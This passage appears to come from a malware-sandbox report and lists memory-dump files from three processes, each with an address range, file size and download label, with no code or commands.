memory/2488-34-0x0000000005140000-0x0000000005141000-memory.dmp

Filesize
4KB

Download
memory/2488-32-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2728-29-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-4-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-30-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-5-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2728-28-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2728-18-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-80-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-31-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-11-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-8-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-7-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-9-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2732-78-0x000000001E980000-0x000000001E9C0000-memory.dmp

Filesize
256KB

Download
memory/2732-66-0x000000006F730000-0x0000000070792000-memory.dmp

Filesize
16.4MB

Download
memory/2732-70-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-45-0x000000006F730000-0x0000000070792000-memory.dmp

Filesize
16.4MB

Download
memory/2732-72-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-44-0x00000000003F0000-0x0000000001D47000-memory.dmp

Filesize
25.3MB

Download
memory/2732-68-0x00000000003F0000-0x0000000001D47000-memory.dmp

Filesize
25.3MB

Download
memory/2732-42-0x00000000003F0000-0x0000000001D47000-memory.dmp

Filesize
25.3MB

Download
memory/2732-43-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/2732-84-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2732-85-0x000000001E980000-0x000000001E9C0000-memory.dmp

Filesize
256KB

Download
memory/2732-86-0x000000001E980000-0x000000001E9C0000-memory.dmp

Filesize
256KB

Download
memory/2732-87-0x000000001E980000-0x000000001E9C0000-memory.dmp

Filesize
256KB

Download